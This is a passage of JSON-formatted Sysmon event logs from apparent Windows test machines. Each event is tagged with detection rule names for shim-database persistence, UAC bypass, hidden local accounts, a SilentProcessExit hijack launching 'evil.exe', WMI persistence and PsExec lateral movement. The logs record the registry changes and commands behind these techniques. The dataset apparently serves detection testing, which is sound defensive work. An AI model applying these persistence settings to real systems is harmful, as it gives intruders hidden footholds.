Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-001012610800","ProcessId":2548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:47.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966449,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:47.124363Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-0010D96C0800","ProcessId":3140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:47.364"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966464,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:47.474867Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Users\\user01\\Desktop\\titi.sdb\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\user01\\Desktop\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-57EC-5C91-0000-001097810900","ProcessId":2848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:58:20.894"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966480,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:58:20.994444Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-528D-5C91-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"c:\\osk.exe\" ","ParentImage":"C:\\osk.exe","ParentProcessGuid":"365ABB72-57FB-5C91-0000-00104FD40900","ParentProcessId":2128,"ProcessGuid":"365ABB72-5804-5C91-0000-001044DE0900","ProcessId":2456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-03-19 20:58:44.187"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966501,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:58:44.237867Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966533,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966534,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 21:20:35.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966535,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:35.603518Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"%%ProgramFiles%%\\Windows NT\\Accessories\\WORDPAD.EXE\" \"%%1\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106_CLASSES\\sdb_auto_file\\shell\\open\\command\\(Default)","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966543,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"WORDPAD.EXE","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sdb\\OpenWithList\\a","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966544,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-777F-5C91-0000-0010B95B0000","ProcessId":524,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 23:13:04.090"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966594,"Execution_attributes":{"ProcessID":988,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T23:18:50.627750Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 09:28:22.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134365,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T09:28:22.280355Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 10:03:04.489"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134385,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:03:04.489480Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\sqlsvc\\(Default)","UtcTime":"2020-09-04 10:33:31.842"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134399,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:33:31.843489Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 10:54:22.973"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134408,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:54:22.974353Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 11:00:24.601"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134411,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T11:00:24.602530Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Registry Persistence Mechanisms"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000200)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F5D-5D0A-0000-00109B331300","ProcessId":1356,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\GlobalFlag","UtcTime":"2019-06-19 17:22:41.709"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8034,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:41.709638Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Persistence Mechanisms"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F61-5D0A-0000-0010DB351300","ProcessId":2504,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\ReportingMode","UtcTime":"2019-06-19 17:22:43.912"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8036,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:43.944013Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Persistence Mechanisms"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\temp\\evil.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F63-5D0A-0000-0010F93A1300","ProcessId":1956,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\MonitorProcess","UtcTime":"2019-06-19 17:22:45.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8038,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:45.694013Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Event Consumer Created Named Pipe","WMI Persistence - Script Event Consumer File Write","WMI Persistence - Script Event Consumer"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\scrcons.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Standard Event Consumer - scripting","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=6AEC20B9D4C1AB6F1AB297F28EB6BF93,IMPHASH=CCEC86CC0D16062391CC627BC9466A62","Image":"C:\\Windows\\System32\\wbem\\scrcons.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-701F-5CA5-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-7020-5CA5-0000-0010ED6A0000","ParentProcessId":596,"ProcessGuid":"365ABB72-F76F-5CA4-0000-0010AA201700","ProcessId":2636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-03 18:11:59.996"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":7203,"Execution_attributes":{"ProcessID":1828,"ThreadID":372},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-03T18:12:00.016862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\programdata\\StartupNewHomeAddress","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-BFB2-5CED-0000-0010F2C03600","ProcessId":1520,"RuleName":"Persistence - Startup User Shell Folder Modified","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\startup","UtcTime":"2019-05-28 23:09:38.589"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6625,"Execution_attributes":{"ProcessID":2032,"ThreadID":2420},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-28T23:09:38.589832Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Usage of Sysinternals Tools","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\PsExec64.exe","ProcessGuid":"747F3D96-53D8-5D75-0000-00101811CD00","ProcessId":6868,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Sysinternals\\PsExec\\EulaAccepted","UtcTime":"2019-09-08 19:17:44.203"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38292,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.249169Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\Start","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38294,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.350762Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"%%SystemRoot%%\\PSEXESVC.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\ImagePath","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38295,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.391389Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Remote PowerShell Session Host Process (WinRM)"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\administrator\\Documents\\","Description":"Hostname APP","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","IntegrityLevel":"High","LogonGuid":"DFAE8213-BEAD-5CDC-0000-0020AFDA1500","LogonId":"0x15daaf","ParentCommandLine":"C:\\Windows\\system32\\wsmprovhost.exe -Embedding","ParentImage":"C:\\Windows\\System32\\wsmprovhost.exe","ParentProcessGuid":"DFAE8213-BEAD-5CDC-0000-0010DDDB1500","ParentProcessId":3332,"ProcessGuid":"DFAE8213-BF0B-5CDC-0000-00105A951600","ProcessId":2936,"Product":"Microsoft® Windows® Operating System","RuleName":"Lateral Movement - Windows Remote Management","TerminalSessionId":0,"User":"insecurebank\\Administrator","UtcTime":"2019-05-16 